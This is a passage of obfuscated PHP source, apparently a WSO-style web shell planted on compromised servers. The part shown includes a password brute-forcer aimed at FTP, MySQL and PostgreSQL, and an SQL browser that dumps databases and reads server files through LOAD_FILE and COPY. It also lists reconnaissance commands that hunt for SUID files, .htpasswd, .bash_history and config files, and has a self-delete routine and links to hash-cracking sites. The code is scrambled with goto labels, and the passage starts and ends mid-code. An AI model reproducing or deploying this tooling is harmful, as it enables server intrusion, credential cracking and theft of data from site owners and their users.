a9273; a7fad: $line = explode(":", $line); goto Bd85c; d3acb: if (XCOPhBruteForce(@$server[0],
@$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' .
htmlspecialchars($line[0]) . '<br>'; } goto Dff80; a9273: E7195: goto Ea1b2; Ea1b2: } dae22: } } elseif
($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) {
goto D2bcb; D2bcb: $line = trim($line); goto c56a0; f8abf: fc64b: goto B0768; E2239: if
(XCOPhBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' .
htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto f8abf; c56a0:
++$attempts; goto E2239; B0768: } C237d: } } goto Cf254; a06bf: $attempts = 0; goto D8768; D8768:
$server = explode(":", $_POST['server']); goto F6593; a7921: echo '<h1>Results</h1>
<div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' .
htmlspecialchars($_POST['server']) . '<br>'; goto f9b7a; b9d69: } goto Ee7b8; d7768: XCOPhHeader();
goto e5fa3; Ee7b8: echo '<h1>Bruteforce</h1>
<div class=content>
<table>
<form method=post>
<tr>
<td><span>Type</span></td>' . '<td><select name=proto>
<option value=ftp>FTP</option>
<option value=mysql>MySql</option>
<option value=pgsql>PostgreSql</option>
</select></td>
</tr>
<tr>
<td>' . '<input type=hidden name=c
value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden
name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden
name=charset value="' . htmlspecialchars($_POST['charset']) . '">' .
'<span>Server:port</span></td>' . '<td><input type=text name=server
value="127.0.0.1"></td>
</tr>' . '<tr>
<td><span>Brute type</span></td>' . '<td><label><input type=radio name=type
value="1" checked> /etc/passwd</label></td>
</tr>' . '<tr>
<td></td>
<td><label style="padding-left:15px"><input type=checkbox name=reverse value=1
checked> reverse (login -> nigol)</label></td>
</tr>' . '<tr>
<td></td>
<td><label><input type=radio name=type value="2"> Dictionary</label></td>
</tr>' . '<tr>
<td></td>
<td>
<table style="padding-left:15px">
<tr>
<td><span>Login</span></td>' . '<td><input type=text name=login
value="root"></td>
</tr>' . '<tr>
<td><span>Dictionary</span></td>' . '<td><input type=text name=dict
value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic">
</td>
</tr>
</table>' . '
</td>
</tr>
<tr>
<td></td>
<td><input type=submit value=">>"></td>
</tr>
</form>
</table>'; goto d79e2; d79e2: echo '
</div><br>'; goto Fb2c4; Fb2c4: XCOPhFooter(); goto Bc573; Bc573: } goto F8b88; b3a8a: function
XCOPhWhich($p) { goto ff289; f9833: if (!empty($path)) { return $path; } goto c7552; c7552: return
false; goto F5937; ff289: $path = XCOPhEx('which ' . $p); goto f9833; F5937: } goto D59f0; Ab33f:
function XCOPhPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' .
XCOPhPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font
color=white>' . XCOPhPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' .
XCOPhPerms(@fileperms($f)) . '</font>'; } } goto E579f; e80d6: $default_charset =
'Windows-1251'; goto B8cff; a25c3: if (!empty($_POST['a']) && function_exists('action' .
$_POST['a'])) { call_user_func('action' . $_POST['a']); } goto b936e; F0eb8: if ($os == 'win') {
$aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b
index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active
connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net
user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig
/all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second
extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen",
"process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000
-ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files"
=> "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm
-02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config*
files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f
-name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all
writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" =>
"find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name
service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files
in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type
f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name
.bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find
.fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate
httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate
psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate
admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate
conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate
config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate
config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config*
files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate
'.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate
'.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" =>
"locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto
C5959; A9967: function XCOPhsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto e3323;
E6a75: function XCOPhLogin() { die("
<pre
align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>
"); } goto A9967; A9c07: function actionSelfRemove() { goto ca8a2; F269d: echo '<h1>Suicide</h1>
<div class=content>Really want to remove the shell?<br><a href=#
onclick="g(null,null,\'yes\')">Yes</a></div>'; goto ee48e; ee48e: XCOPhFooter(); goto E26e2;
ca8a2: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__))) {
die('Shell has been removed'); } else { echo 'unlink error!'; } } goto Cc7bf; Cc7bf: if
($_POST['p1'] != 'yes') { XCOPhHeader(); } goto F269d; E26e2: } goto e6d6e; dc87f:
@ini_set('log_errors', 0); goto A9559; F8b88: function actionSql() { goto e17b9; E4a21: if
(@$_POST['type'] == 'mysql') { echo 'selected'; } goto B01a8; Ea111: $db = new
DbClass($_POST['type']); goto B5497; dd83c: echo '
</div>'; goto E236f; B01a8: echo ">MySql</option>
<option
value='pgsql' "; goto bf394; e17b9: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto C9ff9; F934d: Ea8f5: goto a2218; C9ff9: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto Ea8f5; case 'pgsql': goto B111b; ca878: goto Ea8f5; goto b9632; B111b: $host = explode(':', $host); goto B940b; Dcc30: if ($this->link = @pg_connect("
host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; }
goto ca878; B940b: if (!$host[1]) { $host[1]=5432; } goto Dcc30; b9632: } goto efa86; efa86: E5d5f:
goto F934d; a2218: return false; goto e11a7; e11a7: } function selectdb($db) { goto cdbf0; cdbf0:
switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto f12fd; } goto
A322b; A9c10: f12fd: goto D7a54; D7a54: return false; goto b0d4a; A322b: C7685: goto A9c10; b0d4a: }
function query($str) { goto A2e14; a58ad: return false; goto fe694; A2e14: switch ($this->type) {
case 'mysql': return $this->res = @mysql_query($str); goto Ad894; case 'pgsql': return $this->res =
@pg_query($this->link, $str); goto Ad894; } goto D0064; D0064: A36d0: goto A4a57; A4a57: Ad894: goto
a58ad; fe694: } function fetch() { goto B20ad; B20ad: $res = func_num_args() ? func_get_arg(0) :
$this->res; goto A41ec; f9f85: d9a0b: goto d1cac; ea9e0: return false; goto Fb761; d1cac: Dc39c:
goto ea9e0; A41ec: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto Dc39c;
case 'pgsql': return @pg_fetch_assoc($res); goto Dc39c; } goto f9f85; Fb761: } function listDbs() {
goto F44a5; Add28: ed558: goto A4ab7; F44a5: switch ($this->type) { case 'mysql': return
$this->query("SHOW databases"); goto ed558; case 'pgsql': return $this->res = $this->query("SELECT
datname FROM pg_database WHERE datistemplate!='t'"); goto ed558; } goto b604e; b604e: a8ab7: goto
Add28; A4ab7: return false; goto f6533; f6533: } function listTables() { goto fab1f; c6c71: a3b34:
goto e6be7; e6be7: return false; goto e8e09; fab1f: switch ($this->type) { case 'mysql': return
$this->res = $this->query('SHOW TABLES'); goto a3b34; case 'pgsql': return $this->res =
$this->query("select table_name from information_schema.tables where table_schema !=
'information_schema' AND table_schema != 'pg_catalog'"); goto a3b34; } goto D8b78; D8b78: F26fc:
goto c6c71; e8e09: } function error() { goto a7fac; Ba7b0: Ccc41: goto Ec0e6; c97d4: return false;
goto F08b8; Ec0e6: c3902: goto c97d4; a7fac: switch ($this->type) { case 'mysql': return
@mysql_error(); goto c3902; case 'pgsql': return @pg_last_error(); goto c3902; } goto Ba7b0; F08b8:
} function setCharset($str) { goto e1b6b; e1b6b: switch ($this->type) { case 'mysql': if
(function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else {
$this->query('SET CHARSET ' . $str); } goto a5b04; case 'pgsql': return
@pg_set_client_encoding($this->link, $str); goto a5b04; } goto eb01e; d7f7d: a5b04: goto C30e6;
eb01e: a7275: goto d7f7d; C30e6: return false; goto e7c48; e7c48: } function loadFile($str) { goto
C7a0e; Bcb39: return false; goto F39b4; A6c76: Dbdee: goto Bcb39; c903c: ca1ee: goto A6c76; C7a0e:
switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" .
addslashes($str) . "') as file")); goto Dbdee; case 'pgsql': goto aaa85; a1680: return array('file'
=> implode("\n", $r)); goto Ad302; A691a: goto F3940; goto bb298; b09b1: if (!($i = $this->fetch()))
{ goto D1e18; } goto eb672; aaa85: $this->query("CREATE TABLE XCOPh2(file text);COPY XCOPh2 FROM '"
. addslashes($str) . "';select file from XCOPh2;"); goto c6b1b; Adda9: F3940: goto b09b1; bb298:
D1e18: goto Aa9b5; c6b1b: $r = array(); goto Adda9; eb672: $r[] = $i['file']; goto A691a; Ad302:
goto Dbdee; goto fdbce; Aa9b5: $this->query('drop table XCOPh2'); goto a1680; fdbce: } goto c903c;
F39b4: } function dump($table, $fp = false) { goto E3972; f47d7: f6cd3: goto c0503; e4d6c: return
false; goto c1709; c0503: Cf624: goto e4d6c; E3972: switch ($this->type) { case 'mysql': goto Fea55;
E80c2: goto Cf624; goto b56ed; b1227: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto
f9ba1; d9ef1: $columns = array(); goto ffbf1; F5eb6: if ($head) { $sql .= 'INSERT INTO `' . $table .
'` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')'; $head = false; }
else { $sql .= "\n\t,(" . implode(", ", $item) . ')'; } goto e8865; ffbf1: foreach ($item as $k =>
$v) { goto a927d; D653d: $columns[] = "`" . $k . "`"; goto Bc50b; Bc50b: C46bc: goto c6f63; a927d:
if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] =
"'" . @mysql_real_escape_string($v) . "'"; } goto D653d; c6f63: } goto A2263; A2263: C0dcc: goto
F5eb6; F080f: $create = mysql_fetch_array($res); goto fc6d0; Edc77: goto Be6cd; goto B2b6d; fc6d0:
$sql = $create[1] . ";\n"; goto b1227; f9ba1: $this->query('SELECT * FROM `' . $table . '`'); goto
baf43; f88a3: if ($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } goto d9ef1; d9577: $head = true;
goto def9a; def9a: Be6cd: goto Bbe78; Cf4ed: $i++; goto Edc77; Ef71d: if (!$head) { if ($fp) {
fwrite($fp, ";\n\n"); } else { echo ";\n\n"; } } goto E80c2; baf43: $i = 0; goto d9577; Bbe78: if
(!($item = $this->fetch())) { goto B550e; } goto dd624; e8865: if ($fp) { fwrite($fp, $sql); } else
{ echo $sql; } goto Cf4ed; B2b6d: B550e: goto Ef71d; dd624: $sql = ''; goto f88a3; Fea55: $res =
$this->query('SHOW CREATE TABLE `' . $table . '`'); goto F080f; b56ed: case 'pgsql': goto b0e7f;
D64ed: if (!($item = $this->fetch())) { goto ca8e5; } goto aa892; A32c5: $sql = 'INSERT INTO ' .
$table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n"; goto
ba278; E8578: foreach ($item as $k => $v) { goto a0bba; Dd239: $columns[] = $k; goto c70e5; c70e5:
c2f4a: goto d186a; a0bba: $item[$k] = "'" . addslashes($v) . "'"; goto Dd239; d186a: } goto A2bc6;
Ba9a0: goto D3159; goto F22d7; A2bc6: B3766: goto A32c5; b0e7f: $this->query('SELECT * FROM ' .
$table); goto E27bd; F22d7: ca8e5: goto E22af; aa892: $columns = array(); goto E8578; E27bd: D3159:
goto D64ed; E22af: goto Cf624; goto Dd11c; ba278: if ($fp) { fwrite($fp, $sql); } else { echo $sql;
} goto Ba9a0; Dd11c: } goto f47d7; c1709: } } goto Ea111; B5497: if (@$_POST['p2'] == 'download' &&
@$_POST['p1'] != 'select') { goto fd7d9; A6d50: if (empty($_POST['file'])) { goto B7697; a5824:
header("Content-Type: text/plain"); goto f89b4; B7697: ob_start("ob_gzhandler", 4096); goto e461a;
f89b4: foreach ($_POST['tbl'] as $v) { $db->dump($v); B3839: } goto e34c9; e34c9: Bf2a2: goto a6996;
e461a: header("Content-Disposition: attachment; filename=dump.sql"); goto a5824; a6996: exit; goto
C2c9b; C2c9b: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto D06ea; E8120: unset($_POST['p2']);
goto a7d60; c5843: a68b1: goto ba492; ba492: fclose($fp); goto E8120; D06ea: foreach ($_POST['tbl']
as $v) { $db->dump($v, $fp); b32d1: } goto c5843; a7d60: } else { die('
<script>alert("Error! Can\'t open file"); window.history.back(-1)</script>'); } goto a535e; C0a5c:
d17cc: goto A6d50; dc5c9: Fa4bc: goto C0a5c; fd7d9: $db->connect($_POST['sql_host'],
$_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto C6675; b87c5: switch
($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto d17cc; case "UTF-8":
$db->setCharset('utf8'); goto d17cc; case "KOI8-R": $db->setCharset('koi8r'); goto d17cc; case
"KOI8-U": $db->setCharset('koi8u'); goto d17cc; case "cp866": $db->setCharset('cp866'); goto d17cc;
} goto dc5c9; C6675: $db->selectdb($_POST['sql_base']); goto b87c5; a535e: } goto aac0f; F1182: if
(isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'],
$_POST['sql_pass'], $_POST['sql_base'])) { goto Ee3b2; b4b5d: E6555: goto E386d; A205f: echo
"<select name=sql_base>
<option value=''></option>"; goto E440e; D1e77: list($key, $value) = each($item); goto E1c9b;
E386d: B5453: goto E7035; C3bbf: echo '
</select>'; goto f3b73; Ee3b2: switch ($_POST['charset']) { case "Windows-1251":
$db->setCharset('cp1251'); goto B5453; case "UTF-8": $db->setCharset('utf8'); goto B5453; case
"KOI8-R": $db->setCharset('koi8r'); goto B5453; case "KOI8-U": $db->setCharset('koi8u'); goto B5453;
case "cp866": $db->setCharset('cp866'); goto B5453; } goto b4b5d; Bfa7e: if (!($item =
$db->fetch())) { goto ae143; } goto D1e77; c1585: ae143: goto C3bbf; E7035: $db->listDbs(); goto
A205f; E440e: Dd783: goto Bfa7e; E1c9b: echo '
<option value="' . $value . '" ' . ($value == $_POST[' sql_base'] ? 'selected' : '' ) . '>' . $value
. '</option>' ; goto E77f9; E77f9: goto Dd783; goto c1585; f3b73: } else { echo $tmp; } } else {
echo $tmp; } goto B941a; bf394: if (@$_POST['type']=='pgsql' ) { echo 'selected' ; } goto Ef8da;
aac0f: XCOPhHeader(); goto A824b; B941a:
echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n <td><input type=checkbox name=sql_count value='on'"
. (empty($_POST['sql_count']) ? '' : ' checked' )
. "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db = '"
. @addslashes($_POST['sql_base'])
. "';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>"
; goto Cc002; A824b:
echo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='"
. htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" .
(isset($_POST['charset']) ? $_POST['charset'] : '' )
. "'>\r\n<td><select name='type'><option value='mysql' " ; goto E4a21; Ef8da:
echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "
\">
</td>\r\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' :
htmlspecialchars($_POST['sql_login'])) . "\"></td>\r\n<td><input type=text name=sql_pass
value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\">
</td>
<td>"; goto a0256; a0256: $tmp = "<input type=text name=sql_base value=''>"; goto F1182; Cc002: if
(isset($db) && $db->link) { goto Df5a6; fe95c: if (@$_POST['p1'] == 'loadfile') { $file =
$db->loadFile($_POST['p2']); echo '<br />
<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto cc355; A93c6: if
($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@',
`host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form
onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'>
<span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit
value='>>'></form>"; } } goto fe95c; ac300: if (!empty($_POST['sql_base'])) { goto
D037f; D037f: $db->selectdb($_POST['sql_base']); goto d400f; D3b42: echo "<br></form>
<form
onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'>
<textarea name='query'
style='width:100%;height:100px'>"; goto c9020; b24d0: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto c844c; ca784: list($key, $value) = each($item); goto B9de4; Ef333: $value = htmlspecialchars($value); goto b24d0; a757b: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto b2e3b; d027c: if (!($item = $db->fetch())) { goto C052b; } goto De3c3; b2e3b: $title = false; goto f9c00; f9c00: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto B97cf; cd66c: F18be: goto A4f4b; Fb907: echo '<tr class="l' . $line . '">'; goto E9660; c7578: echo '</table>'; goto c7dec; E9660: $line = $line == 1 ? 2 : 1; goto Ce011; ea415: C052b: goto c7578; De3c3: if (!$title) { goto d1a55; ac71f: $line = 2; goto D2708; ace2f: echo '</tr><tr>'; goto ac71f; d1a55: echo '<tr>'; goto a767b; d4516: e507f: goto ee135; a767b: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; A7e1f: } goto d4516; ee135: reset($item); goto Ac255; Ac255: $title = true; goto ace2f; D2708: } goto Fb907; A4f4b: echo '</tr>'; goto Ec8f2; e921c: e5138: goto d027c; Ec8f2: goto e5138; goto ea415; Ce011: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } e4998: } goto cd66c; B97cf: $line = 1; goto e921c; c7dec: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto D3b42; Dc057: if (!($item = $db->fetch($tbls_res))) { goto B72e5; } goto ca784; ea989: B72e5: goto e7993; dfaf9: $tbls_res = $db->listTables(); goto Aa52e; d400f: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto dfaf9; D296b: echo "</td></tr>"; goto Ecd44; a7e37: if (@$_POST['p1'] == 'select') { goto A2ec8; D4b65: $pages = ceil($num['n'] / 30); goto b5f2a; A2ec8: $_POST['p1'] = 'query'; goto ec107; b5f2a: echo "<script>d.sf.onsubmit = function () {
st(\"".$_POST['p2']. "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto E3cfe; E58be: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>"; } goto fdb55; E3cfe: echo " of {$pages}"; goto c2a33; ec107: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto B23f1; fdb55: $_POST['p3']--; goto Eae43; B23f1: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto F2274; c2a33: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>"; } goto E58be; Eae43: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto E3330; E3330: echo "<br><br>"; goto F82b6; F2274: $num = $db->fetch(); goto D4b65; F82b6: } goto a757b; c844c: goto b4e3a; goto ea989; c9020: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto A7155; e7993: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto a7e37; Aa52e: b4e3a: goto Dc057; B9de4: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto Ef333; A7155: echo "</textarea><br /><input
type=submit value='Execute'>"; goto D296b; Ecd44: } goto d8314; d8314: echo "</table>
</form><br />"; goto A93c6; Df5a6: echo "<br />
<table width=100% cellpadding=2 cellspacing=0>"; goto ac300; cc355: } else { echo
htmlspecialchars($db->error()); } goto dd83c; E236f: XCOPhFooter(); goto f8ee3; f8ee3: }
goto B626d; E39a8: if (!function_exists("posix_getpwuid") &&
strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function
posix_getpwuid($p) { return false; } } goto d8f3d; Cf332: function actionStringTools() {
goto Ab0dd; e68b0: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) {
echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto dae7a; d6482: if
(!function_exists('full_urlencode')) { function full_urlencode($p) { goto cc727; ea348: $i =
0; goto e8e4b; A3f49: goto Ea3fb; goto f9d5f; bee72: Ff928: goto Feb22; cc727: $r = ''; goto
ea348; bc6f8: return strtoupper($r); goto Caa7f; Bed8f: if (!($i < strlen($p))) { goto
D58c5; } goto Deeea; Deeea: $r .='%' . dechex(ord($p[$i])); goto bee72; f9d5f: D58c5:
goto bc6f8; Feb22: ++$i; goto A3f49; e8e4b: Ea3fb: goto Bed8f; Caa7f: } } goto be18d;
Db5ad: XCOPhHeader(); goto f8263; ebabf: foreach ($stringTools as $k=> $v) { echo "
<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; A4b18: } goto e3448; dae7a: echo "
</pre>
</div><br>
<h1>Search files:</h1>
<div class=content>\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return
false;\">
<table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr>
<td width='1%'>Text:</td>
<td><input type='text' name='text' style='width:100%'></td>
</tr>\r\n\t\t\t<tr>
<td>Path:</td>
<td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS[' cwd'])
. "' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>"
; goto F7330; e3448: a4cad: goto Fda86; c9f71: if (isset($_POST['ajax'])) { goto a3d31; b99a9:
exit; goto e05d6; Fd322: echo strlen($temp), "\n" , $temp; goto b99a9; c5832: if
(in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto Aee67; fca99:
ob_start(); goto c5832; Aee67:
$temp="document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='"
. addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0" ) . "';\n" ; goto Fd322; a3d31:
XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax' , true); goto fca99; e05d6: } goto Ec7f9;
be18d: $stringTools=array('Base64 encode'=> 'base64_encode', 'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5
hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' =>
'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' =>
'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto c9f71; B3b3d: if
(!function_exists('ascii2hex')) { function ascii2hex($p) { goto Bc47b; A39d1: ++$i; goto Fa350;
c459b: $r .= sprintf('%02X', ord($p[$i])); goto F32c0; c46fe: $i = 0; goto f6975; c9510: if (!($i <
strlen($p))) { goto A06c2; } goto c459b; Fa350: goto A3e0b; goto Bc70c; F32c0: Aab79: goto
A39d1; f6975: A3e0b: goto c9510; Abff3: return strtoupper($r); goto dbe01; Bc47b: $r='' ; goto
c46fe; Bc70c: A06c2: goto Abff3; dbe01: } } goto d6482; f4886: if
(!function_exists('hex2ascii')) { function hex2ascii($p) { goto a74a2; a74a2: $r='' ; goto
f8392; F0752: $i +=2; goto F7ba2; ba4ec: A1fb1: goto F0752; f8392: $i=0; goto C4f54; C4f54:
c7fe6: goto B413a; F7ba2: goto c7fe6; goto C962e; A9328: $r .=chr(hexdec($p[$i] . $p[$i + 1]));
goto ba4ec; cbb1e: return $r; goto a706c; B413a: if (!($i < strLen($p))) { goto B08d9; } goto
A9328; C962e: B08d9: goto cbb1e; a706c: } } goto B3b3d; Fda86:
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " .
(@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax' ] ? 'checked' : '' )
. "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" .
(empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2']))
. "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '' )
. "margin-top:5px' id='strOutput'>" ; goto e68b0; f8263:
echo '<h1>String conversions</h1><div class=content>' ; goto b6325; b6325:
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"
; goto ebabf; a857e:
echo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"
document.hf.action='https://hashcracking.ru/index.php' ;document.hf.submit()\">
<br>\r\n\t\t\t<input type='button' value='md5.rednoize.com'
